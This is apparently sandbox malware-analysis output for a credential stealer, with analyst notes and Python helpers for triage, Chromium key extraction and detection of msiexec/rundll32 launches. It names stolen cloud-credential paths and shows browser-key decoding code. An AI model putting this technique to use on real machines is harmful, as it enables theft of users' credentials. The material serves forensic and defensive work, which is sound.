                                    • API ID: lstrcpylstrlen
                                    • String ID: P$
                                    • API String ID: 2001356338-959893791
                                    • Opcode ID: ef0f3f433acf6f82b89bbfeac54982960315110d376425cb650997592480b0ba
                                    • Instruction ID: 3c0c47c2e1556aa2c8fb28f8049eed7999f5b5f327bd2ba7f5129f7e0a3213fc
                                    • Opcode Fuzzy Hash: ef0f3f433acf6f82b89bbfeac54982960315110d376425cb650997592480b0ba
                                    • Instruction Fuzzy Hash: 6EC183B9900219ABCB14EF60DC99FDE7379BF65304F004599F509A7241EB70EA84CFA1
                                    APIs
                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 001A91FC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateGlobalStream
                                    • String ID: image/jpeg$
                                    • API String ID: 2244384528-1855096929
                                    • Opcode ID: 3f758ce938ef9cf3400843cef0bcc6c85e6423196333aac39011019c34cbe260
                                    • Instruction ID: bee70959efdf3823b222f6e4b90e42b7fc85f5ede7c596850ffa3cceca36bd5f
                                    • Opcode Fuzzy Hash: 3f758ce938ef9cf3400843cef0bcc6c85e6423196333aac39011019c34cbe260
                                    • Instruction Fuzzy Hash: A9714BB5A10208ABDF04DFE4DC89FEEB7B8BF49304F108118F516A7290EB74A944CB61
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A5000
                                    • lstrcat.KERNEL32(?,\.azure\), ref: 001A501D
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4B7C
                                      • Part of subcall function 001A4B60: FindFirstFileA.KERNEL32(?,?), ref: 001A4B93
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A508C
                                    • lstrcat.KERNEL32(?,\.aws\), ref: 001A50A9
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC4), ref: 001A4BC1
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B0FC8), ref: 001A4BD7
                                      • Part of subcall function 001A4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 001A4DCD
                                      • Part of subcall function 001A4B60: FindClose.KERNEL32(000000FF), ref: 001A4DE2
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A5118
                                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 001A5135
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4C00
                                      • Part of subcall function 001A4B60: StrCmpCA.SHLWAPI(?,001B08D3), ref: 001A4C15
                                      • Part of subcall function 001A4B60: wsprintfA.USER32 ref: 001A4C32
                                      • Part of subcall function 001A4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 001A4C6E
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,00E2EB40), ref: 001A4C9A
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,001B0FE0), ref: 001A4CAC
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,?), ref: 001A4CC0
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,001B0FE4), ref: 001A4CD2
                                      • Part of subcall function 001A4B60: lstrcat.KERNEL32(?,?), ref: 001A4CE6
                                      • Part of subcall function 001A4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 001A4CFC
                                      • Part of subcall function 001A4B60: DeleteFileA.KERNEL32(?), ref: 001A4D81
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                    • API String ID: 949356159-974132213
                                    • Opcode ID: 7b79e1cf129e114168d9c4176c8c4f31eb7103f18c76477e4dc49533b35125d6
                                    • Instruction ID: 039f42116b5b48e2c3a6a5b8efcc9cba6460c75900ba71a96c59db6b2aee693b
                                    • Opcode Fuzzy Hash: 7b79e1cf129e114168d9c4176c8c4f31eb7103f18c76477e4dc49533b35125d6
                                    • Instruction Fuzzy Hash: E14160BA94020867DB60F770EC97FED73285B65704F404994B689A60C1EFB4A7C8CB92
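The record above documents a cloud-credential collector: a subcall resolves a base folder with SHGetFolderPathA and CSIDL 0x1C (CSIDL_LOCAL_APPDATA), lstrcat appends `\.azure\`, `\.aws\` and `\.IdentityService\`, FindFirstFileA/FindNextFileA walk `*.*` (the StrCmpCA calls skip `.` and `..`), PathMatchSpecA filters names, CopyFileA stages each hit under `Azure\.azure`, `Azure\.aws` or `Azure\.IdentityService`, and DeleteFileA cleans up afterwards. The following triage helper is an added example, not code from the report or the sample: it reproduces that walk against a directory you point it at, so a responder can list which files the routine would have taken from a given host in the same relative layout that shows up in the stolen archive. Which PathMatchSpecA pattern belongs to which directory is inferred from the String ID field (`*.*` twice, `msal.cache` once), the staging folder name `Azure` is taken from the same field, and the sample tree it builds is constructed for the demo.

```python
import fnmatch
import os
import tempfile

# Directory suffix the routine appends to the CSIDL_LOCAL_APPDATA path, the
# staging folder it is copied into, and the PathMatchSpecA pattern. Pairing
# "msal.cache" with .IdentityService and "*.*" with the other two directories
# is an inference from the record's String ID field, not something it states.
TARGETS = (
    (".azure",           os.path.join("Azure", ".azure"),           "*.*"),
    (".aws",             os.path.join("Azure", ".aws"),             "*.*"),
    (".IdentityService", os.path.join("Azure", ".IdentityService"), "msal.cache"),
)


def _matches(name, pattern):
    """Approximate PathMatchSpecA: case-insensitive, and "*.*" matches every
    name, including names without a dot (Win32 semantics, unlike fnmatch)."""
    if pattern == "*.*":
        return True
    return fnmatch.fnmatchcase(name.lower(), pattern.lower())


def collect_targets(local_appdata):
    """Return [(staged_relative_path, source_path)] for every file the routine
    would copy. `local_appdata` stands in for what SHGetFolderPathA resolves."""
    found = []
    for suffix, staged_dir, pattern in TARGETS:
        directory = os.path.join(local_appdata, suffix)
        if not os.path.isdir(directory):
            continue
        # FindFirstFileA/FindNextFileA over "*.*"; os.listdir already omits the
        # "." and ".." entries the sample filters out with StrCmpCA.
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            if os.path.isfile(path) and _matches(name, pattern):
                found.append((os.path.join(staged_dir, name), path))
    return found


def build_demo_profile():
    """Constructed sample tree (not taken from any real host) so the example
    runs offline: an AWS CLI credentials file, an MSAL cache, one decoy."""
    root = tempfile.mkdtemp(prefix="stealc-triage-")
    os.makedirs(os.path.join(root, ".aws"))
    os.makedirs(os.path.join(root, ".IdentityService"))
    for rel in ((".aws", "credentials"),
                (".IdentityService", "msal.cache"),
                (".IdentityService", "notes.txt")):
        with open(os.path.join(root, *rel), "w") as fh:
            fh.write("placeholder\n")
    return root


if __name__ == "__main__":
    # On a Windows host point this at %LOCALAPPDATA% (what CSIDL 0x1C resolves to);
    # anywhere else the constructed tree is used.
    root = os.environ.get("LOCALAPPDATA") or build_demo_profile()
    for staged, src in collect_targets(root):
        print(f"{staged}  <-  {src}")
```

The record only shows CSIDL 0x1C being passed to the subcall, so when checking a real host run the helper against both `%LOCALAPPDATA%` (where `.IdentityService` normally lives) and `%USERPROFILE%` (where the AWS and Azure CLIs keep `.aws` and `.azure`); the `.aws\credentials` file in particular is plaintext, so its presence on an infected host should be treated as a key exposure.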
                                    APIs
                                      • Part of subcall function 001A8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001A8F9B
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A453C
                                    • lstrcat.KERNEL32(?,00E2E7A0), ref: 001A455B
                                    • lstrcat.KERNEL32(?,?), ref: 001A456F
                                    • lstrcat.KERNEL32(?,00E2D0B8), ref: 001A4583
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                      • Part of subcall function 001A8F20: GetFileAttributesA.KERNEL32(00000000,?,00191B94,?,?,001B577C,?,?,001B0E22), ref: 001A8F2F
                                      • Part of subcall function 0019A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0019A489
                                      • Part of subcall function 0019A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0019A13C
                                      • Part of subcall function 0019A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0019A161
                                      • Part of subcall function 0019A110: LocalAlloc.KERNEL32(00000040,?), ref: 0019A181
                                      • Part of subcall function 0019A110: ReadFile.KERNEL32(000000FF,?,00000000,0019148F,00000000), ref: 0019A1AA
                                      • Part of subcall function 0019A110: LocalFree.KERNEL32(0019148F), ref: 0019A1E0
                                      • Part of subcall function 0019A110: CloseHandle.KERNEL32(000000FF), ref: 0019A1EA
                                      • Part of subcall function 001A9550: GlobalAlloc.KERNEL32(00000000,001A462D,001A462D), ref: 001A9563
                                    • StrStrA.SHLWAPI(?,00E2E620), ref: 001A4643
                                    • GlobalFree.KERNEL32(?), ref: 001A4762
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A23F
                                      • Part of subcall function 0019A210: LocalAlloc.KERNEL32(00000040,?,?,?,00194F3E,00000000,?), ref: 0019A251
                                      • Part of subcall function 0019A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00194F3E,00000000,00000000), ref: 0019A27A
                                      • Part of subcall function 0019A210: LocalFree.KERNEL32(?,?,?,?,00194F3E,00000000,?), ref: 0019A28F
                                    • lstrcat.KERNEL32(?,00000000), ref: 001A46F3
                                    • StrCmpCA.SHLWAPI(?,001B08D2), ref: 001A4710
                                    • lstrcat.KERNEL32(00000000,00000000), ref: 001A4722
                                    • lstrcat.KERNEL32(00000000,?), ref: 001A4735
                                    • lstrcat.KERNEL32(00000000,001B0FA0), ref: 001A4744
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                    • String ID:
                                    • API String ID: 3541710228-3162483948
                                    • Opcode ID: 3d034b58f617ac86e22ca4719d7f345245094295cd4f5dbc951b8e6261f1a19d
                                    • Instruction ID: 7381351afee8ea7c04db21b4b49b88657f3ab09fceac9e994eba872c8c71cf36
                                    • Opcode Fuzzy Hash: 3d034b58f617ac86e22ca4719d7f345245094295cd4f5dbc951b8e6261f1a19d
                                    • Instruction Fuzzy Hash: 987165B6900208ABDB14EBB0DD96FEE7379AF99300F404598F60597181EB74DB48CBA1
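The subcalls in the record above are the standard first step against a Chromium profile: a file is read whole (CreateFileA, GetFileSizeEx, ReadFile), StrStrA searches it for the literal `"encrypted_key":"`, and CryptStringToBinaryA is called twice with dwFlags 1 (CRYPT_STRING_BASE64), once to size the buffer and once to decode. That string lives in the browser's `Local State` file, and the decoded value is the 5-byte tag `DPAPI` followed by a DPAPI blob that only CryptUnprotectData in the victim's logon session can unwrap, which is why stealers run this on the host rather than offline. The code below is an added example, not from the report or the sample, that shows both the marker search the sample uses and the decode-and-tag-check that follows; the `Local State` fragment it parses is constructed, and the 16 bytes standing in for the DPAPI blob are placeholders.

```python
import base64
import json

DPAPI_TAG = b"DPAPI"
MARKER = '"encrypted_key":"'


def find_by_marker(local_state_text):
    """What the sample does: StrStrA for the literal marker, then read up to the
    next double quote. It works because Chromium writes Local State as compact
    JSON with no whitespace after the colon."""
    start = local_state_text.find(MARKER)
    if start < 0:
        return None
    start += len(MARKER)
    end = local_state_text.find('"', start)
    return local_state_text[start:end] if end > start else None


def decode_dpapi_blob(encoded_key):
    """Equivalent of CryptStringToBinaryA(CRYPT_STRING_BASE64) plus the tag
    check. Returns the DPAPI blob, or None if the value is not a Chromium key."""
    try:
        raw = base64.b64decode(encoded_key, validate=True)
    except ValueError:            # binascii.Error is a ValueError subclass
        return None
    if not raw.startswith(DPAPI_TAG):
        return None
    return raw[len(DPAPI_TAG):]


def extract_encrypted_key(local_state_text):
    """Marker search, base64 decode, tag strip: the bytes that would next be
    handed to CryptUnprotectData on the victim's machine."""
    encoded = find_by_marker(local_state_text)
    return decode_dpapi_blob(encoded) if encoded else None


# Constructed sample (not a real Local State file). Chromium emits compact JSON,
# hence the explicit separators; the blob content is a placeholder.
SAMPLE_BLOB = bytes(range(1, 17))
SAMPLE_ENCODED_KEY = base64.b64encode(DPAPI_TAG + SAMPLE_BLOB).decode("ascii")
SAMPLE_LOCAL_STATE = json.dumps(
    {"os_crypt": {"encrypted_key": SAMPLE_ENCODED_KEY},
     "profile": {"last_used": "Default"}},
    separators=(",", ":"),
)

if __name__ == "__main__":
    blob = extract_encrypted_key(SAMPLE_LOCAL_STATE)
    print("DPAPI blob:", blob.hex() if blob else None)
```

The unwrap itself is deliberately left out: on Windows it is a single CryptUnprotectData call, but it only succeeds as the user who owns the profile, so from a forensic point of view the relevant question is whether the sample ran in that user's session. Note also that the `encrypted_key` value protects passwords and, in older builds, cookies; recent Chrome releases guard cookies with an additional app-bound key that this step alone does not reach, which is consistent with the DevTools-related strings seen elsewhere in this report.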
                                    APIs
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A3415
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A35AD
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 001A373A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell$lstrcpy
                                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                    • API String ID: 2507796910-3625054190
                                    • Opcode ID: 03a5515c6b08ae7caa07902b51ca4f4b2de10a637916018b7d02efa700ce9302
                                    • Instruction ID: 5c5b28f2e6742f1cd880851b9570a62828a29d2dbae88700bf6800aaacecb93d
                                    • Opcode Fuzzy Hash: 03a5515c6b08ae7caa07902b51ca4f4b2de10a637916018b7d02efa700ce9302
                                    • Instruction Fuzzy Hash: 64123175910108ABDB59FBE0DDA2FEEB739AF25300F404599F10666192EF306B49CF62
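The record above is the sample's second-stage launcher: three ShellExecuteEx calls (the 0x3C argument is sizeof(SHELLEXECUTEINFOA) on 32-bit), with the String ID field giving the command-line shapes it builds, `C:\Windows\system32\msiexec.exe /i "<path>.msi" /passive` and `C:\Windows\system32\rundll32.exe` with a `.dll` path. Those two shapes are cheap to hunt for in process-creation telemetry. The detection logic below is an added example, not from the report or the sample: it classifies command lines on exactly those patterns and runs over constructed process-creation records. The sample's on-disk location, the payload paths and the timestamps in those records are assumed, and the rule that ignores rundll32 loading DLLs from under the Windows directory is analyst tuning rather than anything the report states.

```python
import re

# Command-line shapes taken from the record's String ID field. The sample wraps
# the payload path in double quotes (the '"" ' fragments), so the regexes do too.
MSIEXEC_RE = re.compile(r'(?i)msiexec\.exe"?\s+/i\s+"([^"]+\.msi)"\s+/passive\b')
RUNDLL_RE = re.compile(r'(?i)rundll32\.exe"?\s+(?:"([^"]+\.dll)"|(\S+?\.dll))')

# Analyst tuning, not from the report: rundll32 loading a DLL from under the
# Windows directory is routine, so only DLLs outside it are flagged. The
# system root is assumed to be C:\Windows.
WINDOWS_DIR = "c:\\windows\\"


def classify(command_line):
    """Return (label, payload_path) when a command line matches one of the
    launcher shapes, else None."""
    m = MSIEXEC_RE.search(command_line)
    if m:
        return ("msiexec_passive_install", m.group(1))
    m = RUNDLL_RE.search(command_line)
    if m:
        dll = m.group(1) or m.group(2)
        if not dll.lower().startswith(WINDOWS_DIR):
            return ("rundll32_dll_load", dll)
    return None


def scan(records):
    """records: iterable of (timestamp, parent_image, command_line).
    Returns [(timestamp, parent_image, label, payload_path)] for each hit;
    the parent image is kept so the analyst can pivot to the dropper."""
    hits = []
    for ts, parent, cmd in records:
        verdict = classify(cmd)
        if verdict:
            hits.append((ts, parent, verdict[0], verdict[1]))
    return hits


# Constructed process-creation records. The first two mimic the report's sample
# (file.exe) spawning the two launchers; its location and the payload paths are
# assumed. The last two are routine Windows activity that must not fire.
SAMPLE_RECORDS = [
    ("2024-10-31T12:00:01Z", r"C:\Users\user\Desktop\file.exe",
     r'"C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\payload.msi" /passive'),
    ("2024-10-31T12:00:02Z", r"C:\Users\user\Desktop\file.exe",
     r'C:\Windows\system32\rundll32.exe "C:\Users\user\AppData\Local\Temp\payload.dll"'),
    ("2024-10-31T12:00:03Z", r"C:\Windows\explorer.exe",
     r"C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,Control_RunDLL"),
    ("2024-10-31T12:00:04Z", r"C:\Windows\system32\services.exe",
     r"C:\Windows\system32\msiexec.exe /V"),
]

if __name__ == "__main__":
    for ts, parent, label, payload in scan(SAMPLE_RECORDS):
        print(f"{ts} {label}: {payload} (parent: {parent})")
```

`/passive` is what makes the msiexec branch worth a dedicated rule: it installs with only a progress bar and no prompts, which is unusual for interactive user activity but exactly what an unattended dropper wants. Pair either hit with the parent image and the write of the payload file to the same path a few seconds earlier to turn it from a lead into a confirmed chain.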
                                    APIs
                                      • Part of subcall function 00199A50: InternetOpenA.WININET(001B0AF6,00000001,00000000,00000000,00000000), ref: 00199A6A
                                    • lstrcat.KERNEL32(?,cookies), ref: 00199CAF
                                    • lstrcat.KERNEL32(?,001B12C4), ref: 00199CC1
                                    • lstrcat.KERNEL32(?,?), ref: 00199CD5
                                    • lstrcat.KERNEL32(?,001B12C8), ref: 00199CE7
                                    • lstrcat.KERNEL32(?,?), ref: 00199CFB
                                    • lstrcat.KERNEL32(?,.txt), ref: 00199D0D
                                    • lstrlen.KERNEL32(00000000), ref: 00199D17
                                    • lstrlen.KERNEL32(00000000), ref: 00199D26
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000605000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.00000000006E1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.0000000000706000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062060637.000000000071D000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062165551.00000000008BA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2062179175.00000000008BB000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                    • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                    • API String ID: 3174675846-3542011879
                                    • Opcode ID: 5603ae3171f4158fb47eeb690ce014dd485b2660926a589f38c853312e816775
                                    • Instruction ID: 18cf21489e22ef64c717ab9f5b7304b9aa1f5b0d6a2bc18e11147fb8c2d575e5
                                    • Opcode Fuzzy Hash: 5603ae3171f4158fb47eeb690ce014dd485b2660926a589f38c853312e816775
                                    • Instruction Fuzzy Hash: 5D515DB1D10608ABDF14EBE4DCA5FEE7738AF15301F404698F10AA7191EB706A49CF61
                                    APIs
                                      • Part of subcall function 001AAAB0: lstrcpy.KERNEL32(?,00000000), ref: 001AAAF6
                                      • Part of subcall function 001962D0: InternetOpenA.WININET(001B0DFF,00000001,00000000,00000000,00000000), ref: 00196331
                                      • Part of subcall function 001962D0: StrCmpCA.SHLWAPI(?,00E2EBB0), ref: 00196353
                                      • Part of subcall function 001962D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00196385
                                      • Part of subcall function 001962D0: HttpOpenRequestA.WININET(00000000,GET,?,00E2E2C0,00000000,00000000,00400100,00000000), ref: 001963D5
                                      • Part of subcall function 001962D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0019640F
                                      • Part of subcall function 001962D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00196421
                                      • Part of subcall function 001AABB0: lstrcpy.KERNEL32(?,001B0E1A), ref: 001AAC15
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 001A5568
                                    • lstrlen.KERNEL32(00000000), ref: 001A557F
                                      • Part of subcall function 001A8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001A8FE2
                                    • StrStrA.SHLWAPI(00000000,00000000), ref: 001A55B4
                                    • lstrlen.KERNEL32(00000000), ref: 001A55D3
                                    • lstrlen.KERNEL32(00000000), ref: 001A55FE
                                      • Part of subcall function 001AAA50: lstrcpy.KERNEL32(001B0E1A,00000000), ref: 001AAA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2058752033.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                     • Associated: 00000000.00000002.2058733000.0000000000190000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000001BC000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002CD000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002D9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.00000000002FE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2058752033.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.2059833412.000000000047A000.00000040.00000001.01000000.00000003.sdmp
